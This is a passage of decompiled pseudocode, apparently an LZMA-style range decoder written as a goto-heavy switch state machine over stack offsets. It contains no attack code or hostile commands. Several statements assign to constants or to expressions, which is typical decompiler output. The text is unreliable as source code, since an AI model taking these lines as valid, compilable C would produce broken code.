                                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                            											L139:
                                            											_t537 =  *(_t644 - 0x84);
                                            											L140:
                                            											 *(_t644 - 0x88) = _t537;
                                            											goto L1;
                                            										case 6:
                                            											L25:
                                            											__edx = 0;
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L36:
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) = 1;
                                            												 *(__ebp - 0x84) = 7;
                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											L26:
                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            											__esi =  *(__ebp - 0x60);
                                            											__cl = 8;
                                            											__cl = 8 -  *(__ebp - 0x3c);
                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            											__ecx =  *(__ebp - 0x3c);
                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            											__ecx =  *(__ebp - 4);
                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            											__eflags =  *(__ebp - 0x38) - 4;
                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											if( *(__ebp - 0x38) >= 4) {
                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                            												if( *(__ebp - 0x38) >= 0xa) {
                                            													_t98 = __ebp - 0x38;
                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                            													__eflags =  *_t98;
                                            												} else {
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            												}
                                            											} else {
                                            												 *(__ebp - 0x38) = 0;
                                            											}
                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                            											if( *(__ebp - 0x34) == __edx) {
                                            												L35:
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												goto L61;
                                            											} else {
                                            												L32:
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__ecx =  *(__ebp - 8);
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            												goto L41;
                                            											}
                                            										case 7:
                                            											L66:
                                            											__eflags =  *(__ebp - 0x40) - 1;
                                            											if( *(__ebp - 0x40) != 1) {
                                            												L68:
                                            												__eax =  *(__ebp - 0x24);
                                            												 *(__ebp - 0x80) = 0x16;
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												__eax =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            												__eax =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 4) + 0x664;
                                            												__eflags = __eax;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L69;
                                            											}
                                            											L67:
                                            											__eax =  *(__ebp - 4);
                                            											__ecx =  *(__ebp - 0x38);
                                            											 *(__ebp - 0x84) = 8;
                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            											goto L132;
                                            										case 8:
                                            											L70:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xa;
                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            											} else {
                                            												__eax =  *(__ebp - 0x38);
                                            												__ecx =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                            												 *(__ebp - 0x84) = 9;
                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            											}
                                            											goto L132;
                                            										case 9:
                                            											L73:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												goto L90;
                                            											}
                                            											L74:
                                            											__eflags =  *(__ebp - 0x60);
                                            											if( *(__ebp - 0x60) == 0) {
                                            												goto L171;
                                            											}
                                            											L75:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                            											__eflags = _t259;
                                            											0 | _t259 = _t259 + _t259 + 9;
                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                            											goto L76;
                                            										case 0xa:
                                            											L82:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L84:
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xb;
                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											L83:
                                            											__eax =  *(__ebp - 0x28);
                                            											goto L89;
                                            										case 0xb:
                                            											L85:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__ecx =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x20);
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            											} else {
                                            												__eax =  *(__ebp - 0x24);
                                            											}
                                            											__ecx =  *(__ebp - 0x28);
                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            											L89:
                                            											__ecx =  *(__ebp - 0x2c);
                                            											 *(__ebp - 0x2c) = __eax;
                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            											L90:
                                            											__eax =  *(__ebp - 4);
                                            											 *(__ebp - 0x80) = 0x15;
                                            											__eax =  *(__ebp - 4) + 0xa68;
                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            											goto L69;
                                            										case 0xc:
                                            											L99:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L164:
                                            												 *(__ebp - 0x88) = 0xc;
                                            												goto L170;
                                            											}
                                            											L100:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t334 = __ebp - 0x70;
                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t334;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											__eax =  *(__ebp - 0x2c);
                                            											goto L101;
                                            										case 0xd:
                                            											L37:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L159:
                                            												 *(__ebp - 0x88) = 0xd;
                                            												goto L170;
                                            											}
                                            											L38:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t122 = __ebp - 0x70;
                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t122;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L39:
                                            											__eax =  *(__ebp - 0x40);
                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            												goto L48;
                                            											}
                                            											L40:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												goto L54;
                                            											}
                                            											L41:
                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            											 *(__ebp - 0x48) = __eax;
                                            											__eax = __eax + 1;
                                            											__eax = __eax << 8;
                                            											__eax = __eax + __ebx;
                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edx = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												 *(__ebp - 0x40) = 1;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												__ebx = __ebx + __ebx + 1;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edx;
                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L39;
                                            											} else {
                                            												L45:
                                            												goto L37;
                                            											}
                                            										case 0xe:
                                            											L46:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L160:
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											L47:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t156 = __ebp - 0x70;
                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t156;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											while(1) {
                                            												L48:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													break;
                                            												}
                                            												L49:
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t170 = __edx + 1; // 0x1
                                            													__ebx = _t170;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													continue;
                                            												} else {
                                            													L53:
                                            													goto L46;
                                            												}
                                            											}
                                            											L54:
                                            											_t173 = __ebp - 0x34;
                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            											__eflags =  *_t173;
                                            											goto L55;
                                            										case 0xf:
                                            											L58:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L161:
                                            												 *(__ebp - 0x88) = 0xf;
                                            												goto L170;
                                            											}
                                            											L59:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t203 = __ebp - 0x70;
                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t203;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L60:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												L55:
                                            												__al =  *(__ebp - 0x44);
                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            												goto L56;
                                            											}
                                            											L61:
                                            											__eax =  *(__ebp - 0x58);
                                            											__edx = __ebx + __ebx;
                                            											__ecx =  *(__ebp - 0x10);
                                            											__esi = __edx + __eax;
                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												_t217 = __edx + 1; // 0x1
                                            												__ebx = _t217;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L60;
                                            											} else {
                                            												L65:
                                            												goto L58;
                                            											}
                                            										case 0x10:
                                            											L109:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L165:
                                            												 *(__ebp - 0x88) = 0x10;
                                            												goto L170;
                                            											}
                                            											L110:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t365 = __ebp - 0x70;
                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t365;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											goto L111;
                                            										case 0x11:
                                            											L69:
                                            											__esi =  *(__ebp - 0x58);
                                            											 *(__ebp - 0x84) = 0x12;
                                            											goto L132;
                                            										case 0x12:
                                            											L128:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L131:
                                            												__eax =  *(__ebp - 0x58);
                                            												 *(__ebp - 0x84) = 0x13;
                                            												__esi =  *(__ebp - 0x58) + 2;
                                            												L132:
                                            												 *(_t644 - 0x54) = _t642;
                                            												goto L133;
                                            											}
                                            											L129:
                                            											__eax =  *(__ebp - 0x4c);
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											__eflags = __eax;
                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                            											goto L130;
                                            										case 0x13:
                                            											L141:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L143:
                                            												_t469 = __ebp - 0x58;
                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            												__eflags =  *_t469;
                                            												 *(__ebp - 0x30) = 0x10;
                                            												 *(__ebp - 0x40) = 8;
                                            												L144:
                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                            												L145:
                                            												 *(_t644 - 0x50) = 1;
                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                            												goto L149;
                                            											}
                                            											L142:
                                            											__eax =  *(__ebp - 0x4c);
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											 *(__ebp - 0x30) = 8;
                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            											L130:
                                            											 *(__ebp - 0x58) = __eax;
                                            											 *(__ebp - 0x40) = 3;
                                            											goto L144;
                                            										case 0x14:
                                            											L156:
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            											__eax =  *(__ebp - 0x80);
                                            											while(1) {
                                            												L140:
                                            												 *(_t644 - 0x88) = _t537;
                                            												goto L1;
                                            											}
                                            										case 0x15:
                                            											L91:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            											__al = __al & 0x000000fd;
                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            											goto L120;
                                            										case 0x16:
                                            											goto L0;
                                            										case 0x17:
                                            											while(1) {
                                            												L145:
                                            												 *(_t644 - 0x50) = 1;
                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                            												goto L149;
                                            											}
                                            										case 0x18:
                                            											goto L146;
                                            										case 0x19:
                                            											L94:
                                            											__eflags = __ebx - 4;
                                            											if(__ebx < 4) {
                                            												L98:
                                            												 *(__ebp - 0x2c) = __ebx;
                                            												L119:
                                            												_t393 = __ebp - 0x2c;
                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                            												__eflags =  *_t393;
                                            												L120:
                                            												__eax =  *(__ebp - 0x2c);
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													L166:
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            													goto L170;
                                            												}
                                            												L121:
                                            												__eflags = __eax -  *(__ebp - 0x60);
                                            												if(__eax >  *(__ebp - 0x60)) {
                                            													goto L171;
                                            												}
                                            												L122:
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            												__eax =  *(__ebp - 0x30);
                                            												_t400 = __ebp - 0x60;
                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            												__eflags =  *_t400;
                                            												goto L123;
                                            											}
                                            											L95:
                                            											__ecx = __ebx;
                                            											__eax = __ebx;
                                            											__ecx = __ebx >> 1;
                                            											__eax = __ebx & 0x00000001;
                                            											__ecx = (__ebx >> 1) - 1;
                                            											__al = __al | 0x00000002;
                                            											__eax = (__ebx & 0x00000001) << __cl;
                                            											__eflags = __ebx - 0xe;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__ebx >= 0xe) {
                                            												L97:
                                            												__ebx = 0;
                                            												 *(__ebp - 0x48) = __ecx;
                                            												L102:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													L107:
                                            													__eax = __eax + __ebx;
                                            													 *(__ebp - 0x40) = 4;
                                            													 *(__ebp - 0x2c) = __eax;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x644;
                                            													__eflags = __eax;
                                            													L108:
                                            													__ebx = 0;
                                            													 *(__ebp - 0x58) = __eax;
                                            													 *(__ebp - 0x50) = 1;
                                            													 *(__ebp - 0x44) = 0;
                                            													 *(__ebp - 0x48) = 0;
                                            													L112:
                                            													__eax =  *(__ebp - 0x40);
                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            														L118:
                                            														_t391 = __ebp - 0x2c;
                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            														__eflags =  *_t391;
                                            														goto L119;
                                            													}
                                            													L113:
                                            													__eax =  *(__ebp - 0x50);
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            													__eax =  *(__ebp - 0x58);
                                            													__esi = __edi + __eax;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__ax =  *__esi;
                                            													__ecx = __ax & 0x0000ffff;
                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                            													if( *(__ebp - 0xc) >= __edx) {
                                            														__ecx = 0;
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            														__ecx = 1;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            														__ebx = 1;
                                            														__ecx =  *(__ebp - 0x48);
                                            														__ebx = 1 << __cl;
                                            														__ecx = 1 << __cl;
                                            														__ebx =  *(__ebp - 0x44);
                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                            														__cx = __ax;
                                            														__cx = __ax >> 5;
                                            														__eax = __eax - __ecx;
                                            														__edi = __edi + 1;
                                            														__eflags = __edi;
                                            														 *(__ebp - 0x44) = __ebx;
                                            														 *__esi = __ax;
                                            														 *(__ebp - 0x50) = __edi;
                                            													} else {
                                            														 *(__ebp - 0x10) = __edx;
                                            														0x800 = 0x800 - __ecx;
                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            														 *__esi = __dx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L111:
                                            														_t368 = __ebp - 0x48;
                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                            														__eflags =  *_t368;
                                            														goto L112;
                                            													} else {
                                            														L117:
                                            														goto L109;
                                            													}
                                            												}
                                            												L103:
                                            												__ecx =  *(__ebp - 0xc);
                                            												__ebx = __ebx + __ebx;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            													__ecx =  *(__ebp - 0x10);
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													__ebx = __ebx | 0x00000001;
                                            													__eflags = __ebx;
                                            													 *(__ebp - 0x44) = __ebx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													L101:
                                            													_t338 = __ebp - 0x48;
                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                            													__eflags =  *_t338;
                                            													goto L102;
                                            												} else {
                                            													L106:
                                            													goto L99;
                                            												}
                                            											}
                                            											L96:
                                            											__edx =  *(__ebp - 4);
                                            											__eax = __eax - __ebx;
                                            											 *(__ebp - 0x40) = __ecx;
                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            											goto L108;
                                            										case 0x1a:
                                            											L56:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												L162:
                                            												 *(__ebp - 0x88) = 0x1a;
                                            												goto L170;
                                            											}
                                            											L57:
                                            											__ecx =  *(__ebp - 0x68);
                                            											__al =  *(__ebp - 0x5c);
                                            											__edx =  *(__ebp - 8);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            											 *( *(__ebp - 0x68)) = __al;
                                            											__ecx =  *(__ebp - 0x14);
                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                            											__eax = __ecx + 1;
                                            											__edx = 0;
                                            											_t192 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t192;
                                            											goto L80;
                                            										case 0x1b:
                                            											L76:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												L163:
                                            												 *(__ebp - 0x88) = 0x1b;
                                            												goto L170;
                                            											}
                                            											L77:
                                            											__eax =  *(__ebp - 0x14);
                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            											__eflags = __eax -  *(__ebp - 0x74);
                                            											if(__eax >=  *(__ebp - 0x74)) {
                                            												__eax = __eax +  *(__ebp - 0x74);
                                            												__eflags = __eax;
                                            											}
                                            											__edx =  *(__ebp - 8);
                                            											__cl =  *(__eax + __edx);
                                            											__eax =  *(__ebp - 0x14);
                                            											 *(__ebp - 0x5c) = __cl;
                                            											 *(__eax + __edx) = __cl;
                                            											__eax = __eax + 1;
                                            											__edx = 0;
                                            											_t275 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t275;
                                            											__eax =  *(__ebp - 0x68);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											_t284 = __ebp - 0x64;
                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                            											__eflags =  *_t284;
                                            											 *( *(__ebp - 0x68)) = __cl;
                                            											L80:
                                            											 *(__ebp - 0x14) = __edx;
                                            											goto L81;
                                            										case 0x1c:
                                            											while(1) {
                                            												L123:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													break;
                                            												}
                                            												L124:
